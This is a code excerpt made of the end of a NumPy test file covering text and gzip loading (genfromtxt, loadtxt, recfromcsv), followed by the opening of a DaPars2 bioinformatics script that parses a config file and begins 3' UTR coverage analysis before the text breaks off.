#
data = StringIO('1\n2\n3\n4\n')
test = np.ndfromtxt(data, dtype=int)
assert_array_equal(test, control)
#
data = StringIO('1,2,3,4\n')
test = np.ndfromtxt(data, dtype=int, delimiter=asbytes(','))
assert_array_equal(test, control)
def test_comments(self):
"Test the stripping of comments"
control = np.array([1, 2, 3, 5], int)
# Comment on its own line
data = StringIO('# comment\n1,2,3,5\n')
test = np.ndfromtxt(data, dtype=int, delimiter=asbytes(','), comments=asbytes('#'))
assert_equal(test, control)
# Comment at the end of a line
data = StringIO('1,2,3,5# comment\n')
test = np.ndfromtxt(data, dtype=int, delimiter=asbytes(','), comments=asbytes('#'))
assert_equal(test, control)
def test_skiprows(self):
"Test row skipping"
control = np.array([1, 2, 3, 5], int)
kwargs = dict(dtype=int, delimiter=asbytes(','))
#
data = StringIO('comment\n1,2,3,5\n')
test = np.ndfromtxt(data, skip_header=1, **kwargs)
assert_equal(test, control)
#
data = StringIO('# comment\n1,2,3,5\n')
test = np.loadtxt(data, skiprows=1, **kwargs)
assert_equal(test, control)
def test_skip_footer(self):
data = ["# %i" % i for i in range(1, 6)]
data.append("A, B, C")
data.extend(["%i,%3.1f,%03s" % (i, i, i) for i in range(51)])
data[-1] = "99,99"
kwargs = dict(delimiter=",", names=True, skip_header=5, skip_footer=10)
test = np.genfromtxt(StringIO(asbytes("\n".join(data))), **kwargs)
ctrl = np.array([("%f" % i, "%f" % i, "%f" % i) for i in range(41)],
dtype=[(_, float) for _ in "ABC"])
assert_equal(test, ctrl)
def test_skip_footer_with_invalid(self):
import warnings
basestr = '1 1\n2 2\n3 3\n4 4\n5 \n6 \n7 \n'
warnings.filterwarnings("ignore")
# Footer too small to get rid of all invalid values
assert_raises(ValueError, np.genfromtxt,
StringIO(basestr), skip_footer=1)
# except ValueError:
# pass
a = np.genfromtxt(StringIO(basestr), skip_footer=1, invalid_raise=False)
assert_equal(a, np.array([[1., 1.], [2., 2.], [3., 3.], [4., 4.]]))
#
a = np.genfromtxt(StringIO(basestr), skip_footer=3)
assert_equal(a, np.array([[1., 1.], [2., 2.], [3., 3.], [4., 4.]]))
#
basestr = '1 1\n2 \n3 3\n4 4\n5 \n6 6\n7 7\n'
a = np.genfromtxt(StringIO(basestr), skip_footer=1, invalid_raise=False)
assert_equal(a, np.array([[1., 1.], [3., 3.], [4., 4.], [6., 6.]]))
a = np.genfromtxt(StringIO(basestr), skip_footer=3, invalid_raise=False)
assert_equal(a, np.array([[1., 1.], [3., 3.], [4., 4.]]))
warnings.resetwarnings()
def test_header(self):
"Test retrieving a header"
data = StringIO('gender age weight\nM 64.0 75.0\nF 25.0 60.0')
test = np.ndfromtxt(data, dtype=None, names=True)
control = {'gender': np.array(asbytes_nested(['M', 'F'])),
'age': np.array([64.0, 25.0]),
'weight': np.array([75.0, 60.0])}
assert_equal(test['gender'], control['gender'])
assert_equal(test['age'], control['age'])
assert_equal(test['weight'], control['weight'])
def test_auto_dtype(self):
"Test the automatic definition of the output dtype"
data = StringIO('A 64 75.0 3+4j True\nBCD 25 60.0 5+6j False')
test = np.ndfromtxt(data, dtype=None)
control = [np.array(asbytes_nested(['A', 'BCD'])),
np.array([64, 25]),
np.array([75.0, 60.0]),
np.array([3 + 4j, 5 + 6j]),
np.array([True, False]), ]
assert_equal(test.dtype.names, ['f0', 'f1', 'f2', 'f3', 'f4'])
for (i, ctrl) in enumerate(control):
assert_equal(test['f%i' % i], ctrl)
def test_auto_dtype_uniform(self):
"Tests whether the output dtype can be uniformized"
data = StringIO('1 2 3 4\n5 6 7 8\n')
test = np.ndfromtxt(data, dtype=None)
control = np.array([[1, 2, 3, 4], [5, 6, 7, 8]])
assert_equal(test, control)
def test_fancy_dtype(self):
"Check that a nested dtype isn't MIA"
data = StringIO('1,2,3.0\n4,5,6.0\n')
fancydtype = np.dtype([('x', int), ('y', [('t', int), ('s', float)])])
test = np.ndfromtxt(data, dtype=fancydtype, delimiter=',')
control = np.array([(1, (2, 3.0)), (4, (5, 6.0))], dtype=fancydtype)
assert_equal(test, control)
def test_names_overwrite(self):
"Test overwriting the names of the dtype"
descriptor = {'names': ('g', 'a', 'w'),
'formats': ('S1', 'i4', 'f4')}
data = StringIO('M 64.0 75.0\nF 25.0 60.0')
names = ('gender', 'age', 'weight')
test = np.ndfromtxt(data, dtype=descriptor, names=names)
descriptor['names'] = names
control = np.array([('M', 64.0, 75.0),
('F', 25.0, 60.0)], dtype=descriptor)
assert_equal(test, control)
def test_commented_header(self):
"Check that names can be retrieved even if the line is commented out."
data = StringIO("""
#gender age weight
M 21 72.100000
F 35 58.330000
M 33 21.99
""")
# The # is part of the first name and should be deleted automatically.
test = np.genfromtxt(data, names=True, dtype=None)
ctrl = np.array([('M', 21, 72.1), ('F', 35, 58.33), ('M', 33, 21.99)],
dtype=[('gender', '|S1'), ('age', int), ('weight', float)])
assert_equal(test, ctrl)
# Ditto, but we should get rid of the first element
data = StringIO("""
# gender age weight
M 21 72.100000
F 35 58.330000
M 33 21.99
""")
test = np.genfromtxt(data, names=True, dtype=None)
assert_equal(test, ctrl)
def test_autonames_and_usecols(self):
"Tests names and usecols"
data = StringIO('A B C D\n aaaa 121 45 9.1')
test = np.ndfromtxt(data, usecols=('A', 'C', 'D'),
names=True, dtype=None)
control = np.array(('aaaa', 45, 9.1),
dtype=[('A', '|S4'), ('C', int), ('D', float)])
assert_equal(test, control)
def test_converters_with_usecols(self):
"Test the combination user-defined converters and usecol"
data = StringIO('1,2,3,,5\n6,7,8,9,10\n')
test = np.ndfromtxt(data, dtype=int, delimiter=',',
converters={3:lambda s: int(s or - 999)},
usecols=(1, 3,))
control = np.array([[2, -999], [7, 9]], int)
assert_equal(test, control)
def test_converters_with_usecols_and_names(self):
"Tests names and usecols"
data = StringIO('A B C D\n aaaa 121 45 9.1')
test = np.ndfromtxt(data, usecols=('A', 'C', 'D'), names=True,
dtype=None, converters={'C':lambda s: 2 * int(s)})
control = np.array(('aaaa', 90, 9.1),
dtype=[('A', '|S4'), ('C', int), ('D', float)])
assert_equal(test, control)
def test_converters_cornercases(self):
"Test the conversion to datetime."
converter = {'date': lambda s: strptime(s, '%Y-%m-%d %H:%M:%SZ')}
data = StringIO('2009-02-03 12:00:00Z, 72214.0')
test = np.ndfromtxt(data, delimiter=',', dtype=None,
names=['date', 'stid'], converters=converter)
control = np.array((datetime(2009, 02, 03), 72214.),
dtype=[('date', np.object_), ('stid', float)])
assert_equal(test, control)
def test_unused_converter(self):
"Test whether unused converters are forgotten"
data = StringIO("1 21\n 3 42\n")
test = np.ndfromtxt(data, usecols=(1,),
converters={0: lambda s: int(s, 16)})
assert_equal(test, [21, 42])
#
data.seek(0)
test = np.ndfromtxt(data, usecols=(1,),
converters={1: lambda s: int(s, 16)})
assert_equal(test, [33, 66])
def test_invalid_converter(self):
strip_rand = lambda x : float((asbytes('r') in x.lower() and x.split()[-1]) or
(not asbytes('r') in x.lower() and x.strip() or 0.0))
strip_per = lambda x : float((asbytes('%') in x.lower() and x.split()[0]) or
(not asbytes('%') in x.lower() and x.strip() or 0.0))
s = StringIO("D01N01,10/1/2003 ,1 %,R 75,400,600\r\n" \
"L24U05,12/5/2003, 2 %,1,300, 150.5\r\n"
"D02N03,10/10/2004,R 1,,7,145.55")
kwargs = dict(converters={2 : strip_per, 3 : strip_rand}, delimiter=",",
dtype=None)
assert_raises(ConverterError, np.genfromtxt, s, **kwargs)
def test_tricky_converter_bug1666(self):
"Test some corner case"
s = StringIO('q1,2\nq3,4')
cnv = lambda s:float(s[1:])
test = np.genfromtxt(s, delimiter=',', converters={0:cnv})
control = np.array([[1., 2.], [3., 4.]])
assert_equal(test, control)
def test_dtype_with_converters(self):
dstr = "2009; 23; 46"
test = np.ndfromtxt(StringIO(dstr,),
delimiter=";", dtype=float, converters={0:bytes})
control = np.array([('2009', 23., 46)],
dtype=[('f0', '|S4'), ('f1', float), ('f2', float)])
assert_equal(test, control)
test = np.ndfromtxt(StringIO(dstr,),
delimiter=";", dtype=float, converters={0:float})
control = np.array([2009., 23., 46],)
assert_equal(test, control)
def test_dtype_with_object(self):
"Test using an explicit dtype with an object"
from datetime import date
import time
data = asbytes("""
1; 2001-01-01
2; 2002-01-31
""")
ndtype = [('idx', int), ('code', np.object)]
func = lambda s: strptime(s.strip(), "%Y-%m-%d")
converters = {1: func}
test = np.genfromtxt(StringIO(data), delimiter=";", dtype=ndtype,
converters=converters)
control = np.array([(1, datetime(2001, 1, 1)), (2, datetime(2002, 1, 31))],
dtype=ndtype)
assert_equal(test, control)
#
ndtype = [('nest', [('idx', int), ('code', np.object)])]
try:
test = np.genfromtxt(StringIO(data), delimiter=";",
dtype=ndtype, converters=converters)
except NotImplementedError:
pass
else:
errmsg = "Nested dtype involving objects should be supported."
raise AssertionError(errmsg)
def test_userconverters_with_explicit_dtype(self):
"Test user_converters w/ explicit (standard) dtype"
data = StringIO('skip,skip,2001-01-01,1.0,skip')
test = np.genfromtxt(data, delimiter=",", names=None, dtype=float,
usecols=(2, 3), converters={2: bytes})
control = np.array([('2001-01-01', 1.)],
dtype=[('', '|S10'), ('', float)])
assert_equal(test, control)
def test_spacedelimiter(self):
"Test space delimiter"
data = StringIO("1 2 3 4 5\n6 7 8 9 10")
test = np.ndfromtxt(data)
control = np.array([[ 1., 2., 3., 4., 5.],
[ 6., 7., 8., 9., 10.]])
assert_equal(test, control)
def test_integer_delimiter(self):
"Test using an integer for delimiter"
data = " 1 2 3\n 4 5 67\n890123 4"
test = np.genfromtxt(StringIO(data), delimiter=3)
control = np.array([[1, 2, 3], [4, 5, 67], [890, 123, 4]])
assert_equal(test, control)
def test_missing(self):
data = StringIO('1,2,3,,5\n')
test = np.ndfromtxt(data, dtype=int, delimiter=',', \
converters={3:lambda s: int(s or - 999)})
control = np.array([1, 2, 3, -999, 5], int)
assert_equal(test, control)
def test_missing_with_tabs(self):
"Test w/ a delimiter tab"
txt = "1\t2\t3\n\t2\t\n1\t\t3"
test = np.genfromtxt(StringIO(txt), delimiter="\t",
usemask=True,)
ctrl_d = np.array([(1, 2, 3), (np.nan, 2, np.nan), (1, np.nan, 3)],)
ctrl_m = np.array([(0, 0, 0), (1, 0, 1), (0, 1, 0)], dtype=bool)
assert_equal(test.data, ctrl_d)
assert_equal(test.mask, ctrl_m)
def test_usecols(self):
"Test the selection of columns"
# Select 1 column
control = np.array([[1, 2], [3, 4]], float)
data = StringIO()
np.savetxt(data, control)
data.seek(0)
test = np.ndfromtxt(data, dtype=float, usecols=(1,))
assert_equal(test, control[:, 1])
#
control = np.array([[1, 2, 3], [3, 4, 5]], float)
data = StringIO()
np.savetxt(data, control)
data.seek(0)
test = np.ndfromtxt(data, dtype=float, usecols=(1, 2))
assert_equal(test, control[:, 1:])
# Testing with arrays instead of tuples.
data.seek(0)
test = np.ndfromtxt(data, dtype=float, usecols=np.array([1, 2]))
assert_equal(test, control[:, 1:])
def test_usecols_as_css(self):
"Test giving usecols with a comma-separated string"
data = "1 2 3\n4 5 6"
test = np.genfromtxt(StringIO(data),
names="a, b, c", usecols="a, c")
ctrl = np.array([(1, 3), (4, 6)], dtype=[(_, float) for _ in "ac"])
assert_equal(test, ctrl)
def test_usecols_with_structured_dtype(self):
"Test usecols with an explicit structured dtype"
data = StringIO("""JOE 70.1 25.3\nBOB 60.5 27.9""")
names = ['stid', 'temp']
dtypes = ['S4', 'f8']
test = np.ndfromtxt(data, usecols=(0, 2), dtype=zip(names, dtypes))
assert_equal(test['stid'], asbytes_nested(["JOE", "BOB"]))
assert_equal(test['temp'], [25.3, 27.9])
def test_usecols_with_integer(self):
"Test usecols with an integer"
test = np.genfromtxt(StringIO("1 2 3\n4 5 6"), usecols=0)
assert_equal(test, np.array([1., 4.]))
def test_usecols_with_named_columns(self):
"Test usecols with named columns"
ctrl = np.array([(1, 3), (4, 6)], dtype=[('a', float), ('c', float)])
data = "1 2 3\n4 5 6"
kwargs = dict(names="a, b, c")
test = np.genfromtxt(StringIO(data), usecols=(0, -1), **kwargs)
assert_equal(test, ctrl)
test = np.genfromtxt(StringIO(data),
usecols=('a', 'c'), **kwargs)
assert_equal(test, ctrl)
def test_empty_file(self):
"Test that an empty file raises the proper exception"
data = StringIO()
assert_raises(IOError, np.ndfromtxt, data)
def test_fancy_dtype_alt(self):
"Check that a nested dtype isn't MIA"
data = StringIO('1,2,3.0\n4,5,6.0\n')
fancydtype = np.dtype([('x', int), ('y', [('t', int), ('s', float)])])
test = np.mafromtxt(data, dtype=fancydtype, delimiter=',')
control = ma.array([(1, (2, 3.0)), (4, (5, 6.0))], dtype=fancydtype)
assert_equal(test, control)
def test_shaped_dtype(self):
c = StringIO("aaaa 1.0 8.0 1 2 3 4 5 6")
dt = np.dtype([('name', 'S4'), ('x', float), ('y', float),
('block', int, (2, 3))])
x = np.ndfromtxt(c, dtype=dt)
a = np.array([('aaaa', 1.0, 8.0, [[1, 2, 3], [4, 5, 6]])],
dtype=dt)
assert_array_equal(x, a)
def test_withmissing(self):
data = StringIO('A,B\n0,1\n2,N/A')
kwargs = dict(delimiter=",", missing_values="N/A", names=True)
test = np.mafromtxt(data, dtype=None, **kwargs)
control = ma.array([(0, 1), (2, -1)],
mask=[(False, False), (False, True)],
dtype=[('A', np.int), ('B', np.int)])
assert_equal(test, control)
assert_equal(test.mask, control.mask)
#
data.seek(0)
test = np.mafromtxt(data, **kwargs)
control = ma.array([(0, 1), (2, -1)],
mask=[(False, False), (False, True)],
dtype=[('A', np.float), ('B', np.float)])
assert_equal(test, control)
assert_equal(test.mask, control.mask)
def test_user_missing_values(self):
data = "A, B, C\n0, 0., 0j\n1, N/A, 1j\n-9, 2.2, N/A\n3, -99, 3j"
basekwargs = dict(dtype=None, delimiter=",", names=True,)
mdtype = [('A', int), ('B', float), ('C', complex)]
#
test = np.mafromtxt(StringIO(data), missing_values="N/A",
**basekwargs)
control = ma.array([(0, 0.0, 0j), (1, -999, 1j),
(-9, 2.2, -999j), (3, -99, 3j)],
mask=[(0, 0, 0), (0, 1, 0), (0, 0, 1), (0, 0, 0)],
dtype=mdtype)
assert_equal(test, control)
#
basekwargs['dtype'] = mdtype
test = np.mafromtxt(StringIO(data),
missing_values={0:-9, 1:-99, 2:-999j}, **basekwargs)
control = ma.array([(0, 0.0, 0j), (1, -999, 1j),
(-9, 2.2, -999j), (3, -99, 3j)],
mask=[(0, 0, 0), (0, 1, 0), (1, 0, 1), (0, 1, 0)],
dtype=mdtype)
assert_equal(test, control)
#
test = np.mafromtxt(StringIO(data),
missing_values={0:-9, 'B':-99, 'C':-999j},
**basekwargs)
control = ma.array([(0, 0.0, 0j), (1, -999, 1j),
(-9, 2.2, -999j), (3, -99, 3j)],
mask=[(0, 0, 0), (0, 1, 0), (1, 0, 1), (0, 1, 0)],
dtype=mdtype)
assert_equal(test, control)
def test_user_filling_values(self):
"Test with missing and filling values"
ctrl = np.array([(0, 3), (4, -999)], dtype=[('a', int), ('b', int)])
data = "N/A, 2, 3\n4, ,???"
kwargs = dict(delimiter=",",
dtype=int,
names="a,b,c",
missing_values={0:"N/A", 'b':" ", 2:"???"},
filling_values={0:0, 'b':0, 2:-999})
test = np.genfromtxt(StringIO(data), **kwargs)
ctrl = np.array([(0, 2, 3), (4, 0, -999)],
dtype=[(_, int) for _ in "abc"])
assert_equal(test, ctrl)
#
test = np.genfromtxt(StringIO(data), usecols=(0, -1), **kwargs)
ctrl = np.array([(0, 3), (4, -999)], dtype=[(_, int) for _ in "ac"])
assert_equal(test, ctrl)
def test_withmissing_float(self):
data = StringIO('A,B\n0,1.5\n2,-999.00')
test = np.mafromtxt(data, dtype=None, delimiter=',',
missing_values='-999.0', names=True,)
control = ma.array([(0, 1.5), (2, -1.)],
mask=[(False, False), (False, True)],
dtype=[('A', np.int), ('B', np.float)])
assert_equal(test, control)
assert_equal(test.mask, control.mask)
def test_with_masked_column_uniform(self):
"Test masked column"
data = StringIO('1 2 3\n4 5 6\n')
test = np.genfromtxt(data, dtype=None,
missing_values='2,5', usemask=True)
control = ma.array([[1, 2, 3], [4, 5, 6]], mask=[[0, 1, 0], [0, 1, 0]])
assert_equal(test, control)
def test_with_masked_column_various(self):
"Test masked column"
data = StringIO('True 2 3\nFalse 5 6\n')
test = np.genfromtxt(data, dtype=None,
missing_values='2,5', usemask=True)
control = ma.array([(1, 2, 3), (0, 5, 6)],
mask=[(0, 1, 0), (0, 1, 0)],
dtype=[('f0', bool), ('f1', bool), ('f2', int)])
assert_equal(test, control)
def test_invalid_raise(self):
"Test invalid raise"
data = ["1, 1, 1, 1, 1"] * 50
for i in range(5):
data[10 * i] = "2, 2, 2, 2 2"
data.insert(0, "a, b, c, d, e")
mdata = StringIO("\n".join(data))
#
kwargs = dict(delimiter=",", dtype=None, names=True)
# XXX: is there a better way to get the return value of the callable in
# assert_warns ?
ret = {}
def f(_ret={}):
_ret['mtest'] = np.ndfromtxt(mdata, invalid_raise=False, **kwargs)
assert_warns(ConversionWarning, f, _ret=ret)
mtest = ret['mtest']
assert_equal(len(mtest), 45)
assert_equal(mtest, np.ones(45, dtype=[(_, int) for _ in 'abcde']))
#
mdata.seek(0)
assert_raises(ValueError, np.ndfromtxt, mdata,
delimiter=",", names=True)
def test_invalid_raise_with_usecols(self):
"Test invalid_raise with usecols"
data = ["1, 1, 1, 1, 1"] * 50
for i in range(5):
data[10 * i] = "2, 2, 2, 2 2"
data.insert(0, "a, b, c, d, e")
mdata = StringIO("\n".join(data))
kwargs = dict(delimiter=",", dtype=None, names=True,
invalid_raise=False)
# XXX: is there a better way to get the return value of the callable in
# assert_warns ?
ret = {}
def f(_ret={}):
_ret['mtest'] = np.ndfromtxt(mdata, usecols=(0, 4), **kwargs)
assert_warns(ConversionWarning, f, _ret=ret)
mtest = ret['mtest']
assert_equal(len(mtest), 45)
assert_equal(mtest, np.ones(45, dtype=[(_, int) for _ in 'ae']))
#
mdata.seek(0)
mtest = np.ndfromtxt(mdata, usecols=(0, 1), **kwargs)
assert_equal(len(mtest), 50)
control = np.ones(50, dtype=[(_, int) for _ in 'ab'])
control[[10 * _ for _ in range(5)]] = (2, 2)
assert_equal(mtest, control)
def test_inconsistent_dtype(self):
"Test inconsistent dtype"
data = ["1, 1, 1, 1, -1.1"] * 50
mdata = StringIO("\n".join(data))
converters = {4: lambda x:"(%s)" % x}
kwargs = dict(delimiter=",", converters=converters,
dtype=[(_, int) for _ in 'abcde'],)
assert_raises(ValueError, np.genfromtxt, mdata, **kwargs)
def test_default_field_format(self):
"Test default format"
data = "0, 1, 2.3\n4, 5, 6.7"
mtest = np.ndfromtxt(StringIO(data),
delimiter=",", dtype=None, defaultfmt="f%02i")
ctrl = np.array([(0, 1, 2.3), (4, 5, 6.7)],
dtype=[("f00", int), ("f01", int), ("f02", float)])
assert_equal(mtest, ctrl)
def test_single_dtype_wo_names(self):
"Test single dtype w/o names"
data = "0, 1, 2.3\n4, 5, 6.7"
mtest = np.ndfromtxt(StringIO(data),
delimiter=",", dtype=float, defaultfmt="f%02i")
ctrl = np.array([[0., 1., 2.3], [4., 5., 6.7]], dtype=float)
assert_equal(mtest, ctrl)
def test_single_dtype_w_explicit_names(self):
"Test single dtype w explicit names"
data = "0, 1, 2.3\n4, 5, 6.7"
mtest = np.ndfromtxt(StringIO(data),
delimiter=",", dtype=float, names="a, b, c")
ctrl = np.array([(0., 1., 2.3), (4., 5., 6.7)],
dtype=[(_, float) for _ in "abc"])
assert_equal(mtest, ctrl)
def test_single_dtype_w_implicit_names(self):
"Test single dtype w implicit names"
data = "a, b, c\n0, 1, 2.3\n4, 5, 6.7"
mtest = np.ndfromtxt(StringIO(data),
delimiter=",", dtype=float, names=True)
ctrl = np.array([(0., 1., 2.3), (4., 5., 6.7)],
dtype=[(_, float) for _ in "abc"])
assert_equal(mtest, ctrl)
def test_easy_structured_dtype(self):
"Test easy structured dtype"
data = "0, 1, 2.3\n4, 5, 6.7"
mtest = np.ndfromtxt(StringIO(data), delimiter=",",
dtype=(int, float, float), defaultfmt="f_%02i")
ctrl = np.array([(0, 1., 2.3), (4, 5., 6.7)],
dtype=[("f_00", int), ("f_01", float), ("f_02", float)])
assert_equal(mtest, ctrl)
def test_autostrip(self):
"Test autostrip"
data = "01/01/2003 , 1.3, abcde"
kwargs = dict(delimiter=",", dtype=None)
mtest = np.ndfromtxt(StringIO(data), **kwargs)
ctrl = np.array([('01/01/2003 ', 1.3, ' abcde')],
dtype=[('f0', '|S12'), ('f1', float), ('f2', '|S8')])
assert_equal(mtest, ctrl)
mtest = np.ndfromtxt(StringIO(data), autostrip=True, **kwargs)
ctrl = np.array([('01/01/2003', 1.3, 'abcde')],
dtype=[('f0', '|S10'), ('f1', float), ('f2', '|S5')])
assert_equal(mtest, ctrl)
def test_replace_space(self):
"Test the 'replace_space' option"
txt = "A.A, B (B), C:C\n1, 2, 3.14"
# Test default: replace ' ' by '_' and delete non-alphanum chars
test = np.genfromtxt(StringIO(txt),
delimiter=",", names=True, dtype=None)
ctrl_dtype = [("AA", int), ("B_B", int), ("CC", float)]
ctrl = np.array((1, 2, 3.14), dtype=ctrl_dtype)
assert_equal(test, ctrl)
# Test: no replace, no delete
test = np.genfromtxt(StringIO(txt),
delimiter=",", names=True, dtype=None,
replace_space='', deletechars='')
ctrl_dtype = [("A.A", int), ("B (B)", int), ("C:C", float)]
ctrl = np.array((1, 2, 3.14), dtype=ctrl_dtype)
assert_equal(test, ctrl)
# Test: no delete (spaces are replaced by _)
test = np.genfromtxt(StringIO(txt),
delimiter=",", names=True, dtype=None,
deletechars='')
ctrl_dtype = [("A.A", int), ("B_(B)", int), ("C:C", float)]
ctrl = np.array((1, 2, 3.14), dtype=ctrl_dtype)
assert_equal(test, ctrl)
def test_incomplete_names(self):
"Test w/ incomplete names"
data = "A,,C\n0,1,2\n3,4,5"
kwargs = dict(delimiter=",", names=True)
# w/ dtype=None
ctrl = np.array([(0, 1, 2), (3, 4, 5)],
dtype=[(_, int) for _ in ('A', 'f0', 'C')])
test = np.ndfromtxt(StringIO(data), dtype=None, **kwargs)
assert_equal(test, ctrl)
# w/ default dtype
ctrl = np.array([(0, 1, 2), (3, 4, 5)],
dtype=[(_, float) for _ in ('A', 'f0', 'C')])
test = np.ndfromtxt(StringIO(data), **kwargs)
def test_names_auto_completion(self):
"Make sure that names are properly completed"
data = "1 2 3\n 4 5 6"
test = np.genfromtxt(StringIO(data),
dtype=(int, float, int), names="a")
ctrl = np.array([(1, 2, 3), (4, 5, 6)],
dtype=[('a', int), ('f0', float), ('f1', int)])
assert_equal(test, ctrl)
def test_names_with_usecols_bug1636(self):
"Make sure we pick up the right names w/ usecols"
data = "A,B,C,D,E\n0,1,2,3,4\n0,1,2,3,4\n0,1,2,3,4"
ctrl_names = ("A", "C", "E")
test = np.genfromtxt(StringIO(data),
dtype=(int, int, int), delimiter=",",
usecols=(0, 2, 4), names=True)
assert_equal(test.dtype.names, ctrl_names)
#
test = np.genfromtxt(StringIO(data),
dtype=(int, int, int), delimiter=",",
usecols=("A", "C", "E"), names=True)
assert_equal(test.dtype.names, ctrl_names)
#
test = np.genfromtxt(StringIO(data),
dtype=int, delimiter=",",
usecols=("A", "C", "E"), names=True)
assert_equal(test.dtype.names, ctrl_names)
def test_fixed_width_names(self):
"Test fix-width w/ names"
data = " A B C\n 0 1 2.3\n 45 67 9."
kwargs = dict(delimiter=(5, 5, 4), names=True, dtype=None)
ctrl = np.array([(0, 1, 2.3), (45, 67, 9.)],
dtype=[('A', int), ('B', int), ('C', float)])
test = np.ndfromtxt(StringIO(data), **kwargs)
assert_equal(test, ctrl)
#
kwargs = dict(delimiter=5, names=True, dtype=None)
ctrl = np.array([(0, 1, 2.3), (45, 67, 9.)],
dtype=[('A', int), ('B', int), ('C', float)])
test = np.ndfromtxt(StringIO(data), **kwargs)
assert_equal(test, ctrl)
def test_filling_values(self):
"Test missing values"
data = "1, 2, 3\n1, , 5\n0, 6, \n"
kwargs = dict(delimiter=",", dtype=None, filling_values= -999)
ctrl = np.array([[1, 2, 3], [1, -999, 5], [0, 6, -999]], dtype=int)
test = np.ndfromtxt(StringIO(data), **kwargs)
assert_equal(test, ctrl)
def test_recfromtxt(self):
#
data = StringIO('A,B\n0,1\n2,3')
kwargs = dict(delimiter=",", missing_values="N/A", names=True)
test = np.recfromtxt(data, **kwargs)
control = np.array([(0, 1), (2, 3)],
dtype=[('A', np.int), ('B', np.int)])
self.assertTrue(isinstance(test, np.recarray))
assert_equal(test, control)
#
data = StringIO('A,B\n0,1\n2,N/A')
test = np.recfromtxt(data, dtype=None, usemask=True, **kwargs)
control = ma.array([(0, 1), (2, -1)],
mask=[(False, False), (False, True)],
dtype=[('A', np.int), ('B', np.int)])
assert_equal(test, control)
assert_equal(test.mask, control.mask)
assert_equal(test.A, [0, 2])
def test_recfromcsv(self):
#
data = StringIO('A,B\n0,1\n2,3')
kwargs = dict(missing_values="N/A", names=True, case_sensitive=True)
test = np.recfromcsv(data, dtype=None, **kwargs)
control = np.array([(0, 1), (2, 3)],
dtype=[('A', np.int), ('B', np.int)])
self.assertTrue(isinstance(test, np.recarray))
assert_equal(test, control)
#
data = StringIO('A,B\n0,1\n2,N/A')
test = np.recfromcsv(data, dtype=None, usemask=True, **kwargs)
control = ma.array([(0, 1), (2, -1)],
mask=[(False, False), (False, True)],
dtype=[('A', np.int), ('B', np.int)])
assert_equal(test, control)
assert_equal(test.mask, control.mask)
assert_equal(test.A, [0, 2])
#
data = StringIO('A,B\n0,1\n2,3')
test = np.recfromcsv(data, missing_values='N/A',)
control = np.array([(0, 1), (2, 3)],
dtype=[('a', np.int), ('b', np.int)])
self.assertTrue(isinstance(test, np.recarray))
assert_equal(test, control)
def test_gzip_load():
a = np.random.random((5, 5))
s = StringIO()
f = gzip.GzipFile(fileobj=s, mode="w")
np.save(f, a)
f.close()
s.seek(0)
f = gzip.GzipFile(fileobj=s, mode="r")
assert_array_equal(np.load(f), a)
def test_gzip_loadtxt():
# Thanks to another windows brokeness, we can't use
# NamedTemporaryFile: a file created from this function cannot be
# reopened by another open call. So we first put the gzipped string
# of the test reference array, write it to a securely opened file,
# which is then read from by the loadtxt function
s = StringIO()
g = gzip.GzipFile(fileobj=s, mode='w')
g.write(asbytes('1 2 3\n'))
g.close()
s.seek(0)
f, name = mkstemp(suffix='.gz')
try:
os.write(f, s.read())
s.close()
assert_array_equal(np.loadtxt(name), [1, 2, 3])
finally:
os.close(f)
os.unlink(name)
def test_gzip_loadtxt_from_string():
s = StringIO()
f = gzip.GzipFile(fileobj=s, mode="w")
f.write(asbytes('1 2 3\n'))
f.close()
s.seek(0)
f = gzip.GzipFile(fileobj=s, mode="r")
assert_array_equal(np.loadtxt(f), [1, 2, 3])
def test_npzfile_dict():
s = StringIO()
x = np.zeros((3, 3))
y = np.zeros((3, 3))
np.savez(s, x=x, y=y)
s.seek(0)
z = np.load(s)
assert 'x' in z
assert 'y' in z
assert 'x' in z.keys()
assert 'y' in z.keys()
for f, a in z.iteritems():
assert f in ['x', 'y']
assert_equal(a.shape, (3, 3))
assert len(z.items()) == 2
for f in z:
assert f in ['x', 'y']
assert 'x' in list(z.iterkeys())
if __name__ == "__main__":
run_module_suite()
|
Dapars2_Multi_Sample.py
|
import numpy as np
import os
import sys
import datetime
import threading
import scipy as sp
import scipy.stats
from multiprocessing import Pool
from bisect import bisect
import math
import time
import multiprocessing
def time_now():#return time
curr_time = datetime.datetime.now()
return curr_time.strftime("%c")
def Convert_wig_into_bp_coverage(extracted_coverage,extracted_3UTR_region,strand_info):
bp_coverage = np.zeros(extracted_3UTR_region[-1] - extracted_3UTR_region[0])
relative_start = extracted_3UTR_region[0]
for i in range(len(extracted_coverage)):
curr_region_start = extracted_3UTR_region[i] - relative_start
curr_region_end = extracted_3UTR_region[i+1] - relative_start
bp_coverage[curr_region_start:curr_region_end] = extracted_coverage[i]
if strand_info == '-':
bp_coverage = bp_coverage[::-1]
return bp_coverage
def parse_cfgfile(cfg_file):
'''Parse configure file
'''
Aligned_Wig_files=''
output_directory=''
Annotated_3UTR_file=''
Output_result_file=''
Coverage_threshold = 1
Num_threads = 1
sequencing_depth_file = ''
for line in open(cfg_file, 'r'):
if line[0] == '\n' or line[0] == '#':
comments = line;
else:
line = line.rstrip()
command = line.split('=');
if command[0] == 'Aligned_Wig_files':
Aligned_Wig_files = command[1].split(',');
if command[0] == 'Output_directory':
output_directory = command[1]
if output_directory[-1] != '/':
output_directory += '/'
if command[0] == 'Annotated_3UTR':
Annotated_3UTR_file = command[1]
if command[0] == 'Output_result_file':
Output_result_file = command[1]
if command[0] == 'sequencing_depth_file':
sequencing_depth_file = command[1]
if command[0] == 'Num_Threads':
Num_threads = int(command[1])
if command[0] == 'Coverage_threshold':
Coverage_threshold = int(command[1])
if Aligned_Wig_files == '':
print("No aligned BAM file found!", file=sys.stderr)
exit(1)
if output_directory=='':
print("No output directory!", file=sys.stderr)
exit(1)
if Annotated_3UTR_file=='':
print("No annotated 3' UTR file!", file=sys.stderr)
exit(1)
if Output_result_file=='':
print("No result file name!", file=sys.stderr)
exit(1)
if sequencing_depth_file=='':
print("No sequencing depth file!", file=sys.stderr)
exit(1)
return Aligned_Wig_files, output_directory, Annotated_3UTR_file, Output_result_file, sequencing_depth_file, Num_threads, Coverage_threshold
def load_sequencing_depth(depth_file):
seq_depth_list = []
for line in open(depth_file, 'r'):
fields = line.strip('\n').split('\t')
seq_depth_list.append(int(fields[-1]))
return np.array(seq_depth_list)
def De_Novo_3UTR_Identification_Loading_Target_Wig_for_TCGA_Multiple_Samples_Multiple_threads_Main3_shared_list(argv=None):
'''multiple threads version
'''
if len(sys.argv) == 1:
print("Please provide the configure file and specify chr name...")
